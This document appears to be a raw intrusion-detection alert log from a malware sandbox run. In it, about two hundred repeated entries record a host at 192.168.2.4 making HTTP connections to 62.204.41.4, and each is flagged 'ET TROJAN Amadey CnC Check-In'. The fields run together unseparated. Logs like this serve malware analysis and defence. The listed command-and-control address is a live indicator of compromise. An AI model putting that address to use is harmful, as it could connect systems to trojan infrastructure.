                            192.168.2.462.204.41.449821802027700 02/08/23-17:37:59.589817TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449977802027700 02/08/23-17:38:48.476008TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450146802027700 02/08/23-17:39:32.113157TCP2027700ET TROJAN Amadey CnC Check-In5014680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450048802027700 02/08/23-17:39:07.945990TCP2027700ET TROJAN Amadey CnC Check-In5004880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450339802027700 02/08/23-17:40:23.560898TCP2027700ET TROJAN Amadey CnC Check-In5033980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449818802027700 02/08/23-17:37:58.886130TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449916802027700 02/08/23-17:38:28.865859TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449972802027700 02/08/23-17:38:47.288532TCP2027700ET TROJAN Amadey CnC Check-In4997280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450043802027700 02/08/23-17:39:06.727733TCP2027700ET TROJAN Amadey CnC Check-In5004380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449756802027700 02/08/23-17:37:41.670965TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449969802027700 02/08/23-17:38:46.576219TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450084802027700 02/08/23-17:39:16.684237TCP2027700ET TROJAN Amadey CnC Check-In5008480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450216802027700 02/08/23-17:39:51.285755TCP2027700ET TROJAN Amadey CnC Check-In5021680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450297802027700 02/08/23-17:40:11.003850TCP2027700ET TROJAN Amadey CnC Check-In5029780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449715802027700 02/08/23-17:37:29.307544TCP2027700ET TROJAN Amadey CnC Check-In4971580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449911802027700 02/08/23-17:38:27.650449TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449952802027700 02/08/23-17:38:39.350317TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450138802027700 02/08/23-17:39:30.185255TCP2027700ET TROJAN Amadey CnC Check-In5013880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450121802027700 02/08/23-17:39:26.010780TCP2027700ET TROJAN Amadey CnC Check-In5012180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450179802027700 02/08/23-17:39:41.189675TCP2027700ET TROJAN Amadey CnC Check-In5017980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450334802027700 02/08/23-17:40:22.362338TCP2027700ET TROJAN Amadey CnC Check-In5033480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449882802027700 02/08/23-17:38:20.650208TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450269802027700 02/08/23-17:40:04.215307TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450015802027700 02/08/23-17:38:59.919529TCP2027700ET TROJAN Amadey CnC Check-In5001580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450174802027700 02/08/23-17:39:38.936331TCP2027700ET TROJAN Amadey CnC Check-In5017480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449841802027700 02/08/23-17:38:07.721676TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450211802027700 02/08/23-17:39:50.075216TCP2027700ET TROJAN Amadey CnC Check-In5021180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450056802027700 02/08/23-17:39:09.948765TCP2027700ET TROJAN Amadey CnC Check-In5005680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449887802027700 02/08/23-17:38:21.867507TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449846802027700 02/08/23-17:38:09.124319TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449924802027700 02/08/23-17:38:30.980933TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450252802027700 02/08/23-17:40:00.048499TCP2027700ET TROJAN Amadey CnC Check-In5025280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449792802027700 02/08/23-17:37:50.312286TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449890802027700 02/08/23-17:38:22.601346TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450154802027700 02/08/23-17:39:34.013057TCP2027700ET TROJAN Amadey CnC Check-In5015480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449826802027700 02/08/23-17:38:00.765609TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450105802027700 02/08/23-17:39:21.799161TCP2027700ET TROJAN Amadey CnC Check-In5010580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449997802027700 02/08/23-17:38:55.560103TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450007802027700 02/08/23-17:38:57.964843TCP2027700ET TROJAN Amadey CnC Check-In5000780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449743802027700 02/08/23-17:37:38.542908TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450068802027700 02/08/23-17:39:12.823951TCP2027700ET TROJAN Amadey CnC Check-In5006880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450089802027700 02/08/23-17:39:17.910351TCP2027700ET TROJAN Amadey CnC Check-In5008980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450292802027700 02/08/23-17:40:09.795778TCP2027700ET TROJAN Amadey CnC Check-In5029280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450187802027700 02/08/23-17:39:44.356708TCP2027700ET TROJAN Amadey CnC Check-In5018780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450126802027700 02/08/23-17:39:27.231066TCP2027700ET TROJAN Amadey CnC Check-In5012680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450224802027700 02/08/23-17:39:53.250127TCP2027700ET TROJAN Amadey CnC Check-In5022480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449771802027700 02/08/23-17:37:45.279320TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450182802027700 02/08/23-17:39:43.165436TCP2027700ET TROJAN Amadey CnC Check-In5018280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449776802027700 02/08/23-17:37:46.462656TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449859802027700 02/08/23-17:38:14.384506TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449813802027700 02/08/23-17:37:57.670732TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450118802027700 02/08/23-17:39:24.995857TCP2027700ET TROJAN Amadey CnC Check-In5011880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450141802027700 02/08/23-17:39:30.904821TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449862802027700 02/08/23-17:38:15.775839TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449854802027700 02/08/23-17:38:11.554320TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449992802027700 02/08/23-17:38:54.369069TCP2027700ET TROJAN Amadey CnC Check-In4999280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450190802027700 02/08/23-17:39:45.059725TCP2027700ET TROJAN Amadey CnC Check-In5019080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449932802027700 02/08/23-17:38:34.522912TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450260802027700 02/08/23-17:40:01.971811TCP2027700ET TROJAN Amadey CnC Check-In5026080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450326802027700 02/08/23-17:40:20.344533TCP2027700ET TROJAN Amadey CnC Check-In5032680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450035802027700 02/08/23-17:39:04.790432TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450076802027700 02/08/23-17:39:14.728959TCP2027700ET TROJAN Amadey CnC Check-In5007680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450289802027700 02/08/23-17:40:09.090062TCP2027700ET TROJAN Amadey CnC Check-In5028980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449784802027700 02/08/23-17:37:48.372470TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450159802027700 02/08/23-17:39:35.215447TCP2027700ET TROJAN Amadey CnC Check-In5015980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450113802027700 02/08/23-17:39:23.761965TCP2027700ET TROJAN Amadey CnC Check-In5011380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450071802027700 02/08/23-17:39:13.540692TCP2027700ET TROJAN Amadey CnC Check-In5007180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449707802027700 02/08/23-17:37:27.346126TCP2027700ET TROJAN Amadey CnC Check-In4970780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449748802027700 02/08/23-17:37:39.760373TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449789802027700 02/08/23-17:37:49.576297TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450030802027700 02/08/23-17:39:03.558067TCP2027700ET TROJAN Amadey CnC Check-In5003080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450091802027700 02/08/23-17:39:18.399399TCP2027700ET TROJAN Amadey CnC Check-In5009180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450097802027700 02/08/23-17:39:19.882191TCP2027700ET TROJAN Amadey CnC Check-In5009780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449708802027700 02/08/23-17:37:27.587074TCP2027700ET TROJAN Amadey CnC Check-In4970880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450229802027700 02/08/23-17:39:54.430750TCP2027700ET TROJAN Amadey CnC Check-In5022980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450284802027700 02/08/23-17:40:07.872773TCP2027700ET TROJAN Amadey CnC Check-In5028480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450327802027700 02/08/23-17:40:20.585581TCP2027700ET TROJAN Amadey CnC Check-In5032780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449806802027700 02/08/23-17:37:56.011816TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450318802027700 02/08/23-17:40:18.404661TCP2027700ET TROJAN Amadey CnC Check-In5031880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450195802027700 02/08/23-17:39:46.232146TCP2027700ET TROJAN Amadey CnC Check-In5019580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449800802027700 02/08/23-17:37:54.558247TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450330802027700 02/08/23-17:40:21.380451TCP2027700ET TROJAN Amadey CnC Check-In5033080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449711802027700 02/08/23-17:37:28.358986TCP2027700ET TROJAN Amadey CnC Check-In4971180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449904802027700 02/08/23-17:38:25.945307TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449965802027700 02/08/23-17:38:45.617119TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449993802027700 02/08/23-17:38:54.619810TCP2027700ET TROJAN Amadey CnC Check-In4999380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450158802027700 02/08/23-17:39:34.968887TCP2027700ET TROJAN Amadey CnC Check-In5015880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449895802027700 02/08/23-17:38:23.802202TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449730802027700 02/08/23-17:37:35.325343TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450063802027700 02/08/23-17:39:11.637718TCP2027700ET TROJAN Amadey CnC Check-In5006380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449984802027700 02/08/23-17:38:51.388411TCP2027700ET TROJAN Amadey CnC Check-In4998480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450161802027700 02/08/23-17:39:35.717280TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450069802027700 02/08/23-17:39:13.057358TCP2027700ET TROJAN Amadey CnC Check-In5006980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450167802027700 02/08/23-17:39:37.216091TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450002802027700 02/08/23-17:38:56.743696TCP2027700ET TROJAN Amadey CnC Check-In5000280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450256802027700 02/08/23-17:40:01.011214TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450170802027700 02/08/23-17:39:37.964961TCP2027700ET TROJAN Amadey CnC Check-In5017080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449894802027700 02/08/23-17:38:23.560699TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449923802027700 02/08/23-17:38:30.522432TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449764802027700 02/08/23-17:37:43.558405TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449768802027700 02/08/23-17:37:44.560979TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449698802027700 02/08/23-17:37:25.130950TCP2027700ET TROJAN Amadey CnC Check-In4969880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449727802027700 02/08/23-17:37:34.234315TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449964802027700 02/08/23-17:38:45.382357TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450139802027700 02/08/23-17:39:30.435909TCP2027700ET TROJAN Amadey CnC Check-In5013980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449710802027700 02/08/23-17:37:28.056201TCP2027700ET TROJAN Amadey CnC Check-In4971080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449834802027700 02/08/23-17:38:03.045302TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450044802027700 02/08/23-17:39:06.968443TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450298802027700 02/08/23-17:40:11.262830TCP2027700ET TROJAN Amadey CnC Check-In5029880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450003802027700 02/08/23-17:38:56.978357TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449875802027700 02/08/23-17:38:18.930672TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450133802027700 02/08/23-17:39:28.968381TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450257802027700 02/08/23-17:40:01.251489TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450228802027700 02/08/23-17:39:54.186332TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450240802027700 02/08/23-17:39:57.100034TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450186802027700 02/08/23-17:39:44.122140TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450050802027700 02/08/23-17:39:08.417524TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449780802027700 02/08/23-17:37:47.419949TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449783802027700 02/08/23-17:37:48.137742TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449749802027700 02/08/23-17:37:39.995475TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449936802027700 02/08/23-17:38:35.483540TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449838802027700 02/08/23-17:38:06.998531TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450028802027700 02/08/23-17:39:03.062795TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449755802027700 02/08/23-17:37:41.418676TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449853802027700 02/08/23-17:38:11.209207TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450212802027700 02/08/23-17:39:50.310671TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450285802027700 02/08/23-17:40:08.115127TCP2027700ET TROJAN Amadey CnC Check-In5028580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449847802027700 02/08/23-17:38:09.522560TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450120802027700 02/08/23-17:39:25.768549TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450203802027700 02/08/23-17:39:48.140900TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450301802027700 02/08/23-17:40:11.986986TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450019802027700 02/08/23-17:39:00.869717TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450031802027700 02/08/23-17:39:03.810410TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450114802027700 02/08/23-17:39:23.997916TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450199802027700 02/08/23-17:39:47.192794TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450117802027700 02/08/23-17:39:24.763181TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449819802027700 02/08/23-17:37:59.122996TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449908802027700 02/08/23-17:38:26.928554TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449949802027700 02/08/23-17:38:38.632550TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450072802027700 02/08/23-17:39:13.789124TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449825802027700 02/08/23-17:38:00.530244TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449920802027700 02/08/23-17:38:29.819519TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449796802027700 02/08/23-17:37:52.334940TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449850802027700 02/08/23-17:38:10.307889TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450231802027700 02/08/23-17:39:54.903522TCP2027700ET TROJAN Amadey CnC Check-In5023180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449777802027700 02/08/23-17:37:46.698035TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449866802027700 02/08/23-17:38:16.739355TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450101802027700 02/08/23-17:39:20.831047TCP2027700ET TROJAN Amadey CnC Check-In5010180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449736802027700 02/08/23-17:37:36.780328TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449980802027700 02/08/23-17:38:49.476222TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450272802027700 02/08/23-17:40:04.969177TCP2027700ET TROJAN Amadey CnC Check-In5027280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450088802027700 02/08/23-17:39:17.657424TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450314802027700 02/08/23-17:40:17.451507TCP2027700ET TROJAN Amadey CnC Check-In5031480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450142802027700 02/08/23-17:39:31.136437TCP2027700ET TROJAN Amadey CnC Check-In5014280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450183802027700 02/08/23-17:39:43.402506TCP2027700ET TROJAN Amadey CnC Check-In5018380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450047802027700 02/08/23-17:39:07.710715TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449760802027700 02/08/23-17:37:42.602798TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450122802027700 02/08/23-17:39:26.248693TCP2027700ET TROJAN Amadey CnC Check-In5012280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450039802027700 02/08/23-17:39:05.758232TCP2027700ET TROJAN Amadey CnC Check-In5003980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450235802027700 02/08/23-17:39:55.857099TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450278802027700 02/08/23-17:40:06.451503TCP2027700ET TROJAN Amadey CnC Check-In5027880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450217802027700 02/08/23-17:39:51.538233TCP2027700ET TROJAN Amadey CnC Check-In5021780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450140802027700 02/08/23-17:39:30.667124TCP2027700ET TROJAN Amadey CnC Check-In5014080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450296802027700 02/08/23-17:40:10.763882TCP2027700ET TROJAN Amadey CnC Check-In5029680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449910802027700 02/08/23-17:38:27.414676TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449742802027700 02/08/23-17:37:38.312283TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449968802027700 02/08/23-17:38:46.334914TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450057802027700 02/08/23-17:39:10.183850TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449732802027700 02/08/23-17:37:35.795795TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449888802027700 02/08/23-17:38:22.112698TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449809802027700 02/08/23-17:37:56.735328TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449827802027700 02/08/23-17:38:01.010259TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449883802027700 02/08/23-17:38:20.884072TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449845802027700 02/08/23-17:38:08.786241TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450173802027700 02/08/23-17:39:38.673124TCP2027700ET TROJAN Amadey CnC Check-In5017380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450049802027700 02/08/23-17:39:08.183040TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450150802027700 02/08/23-17:39:33.073470TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449822802027700 02/08/23-17:37:59.825964TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450227802027700 02/08/23-17:39:53.949663TCP2027700ET TROJAN Amadey CnC Check-In5022780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450286802027700 02/08/23-17:40:08.361527TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449770802027700 02/08/23-17:37:45.036009TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450268802027700 02/08/23-17:40:03.929437TCP2027700ET TROJAN Amadey CnC Check-In5026880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450245802027700 02/08/23-17:39:58.312452TCP2027700ET TROJAN Amadey CnC Check-In5024580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449900802027700 02/08/23-17:38:24.979265TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450104802027700 02/08/23-17:39:21.557053TCP2027700ET TROJAN Amadey CnC Check-In5010480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449704802027700 02/08/23-17:37:26.622936TCP2027700ET TROJAN Amadey CnC Check-In4970480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450067802027700 02/08/23-17:39:12.587874TCP2027700ET TROJAN Amadey CnC Check-In5006780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449817802027700 02/08/23-17:37:58.632623TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450263802027700 02/08/23-17:40:02.709618TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450085802027700 02/08/23-17:39:16.942706TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450145802027700 02/08/23-17:39:31.864006TCP2027700ET TROJAN Amadey CnC Check-In5014580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449722802027700 02/08/23-17:37:31.299531TCP2027700ET TROJAN Amadey CnC Check-In4972280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450300802027700 02/08/23-17:40:11.733230TCP2027700ET TROJAN Amadey CnC Check-In5030080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450323802027700 02/08/23-17:40:19.611218TCP2027700ET TROJAN Amadey CnC Check-In5032380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449697802027700 02/08/23-17:37:24.898911TCP2027700ET TROJAN Amadey CnC Check-In4969780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449835802027700 02/08/23-17:38:03.284886TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449832802027700 02/08/23-17:38:02.498158TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450163802027700 02/08/23-17:39:36.189853TCP2027700ET TROJAN Amadey CnC Check-In5016380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450059802027700 02/08/23-17:39:10.667915TCP2027700ET TROJAN Amadey CnC Check-In5005980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450102802027700 02/08/23-17:39:21.074270TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.462.204.41.4
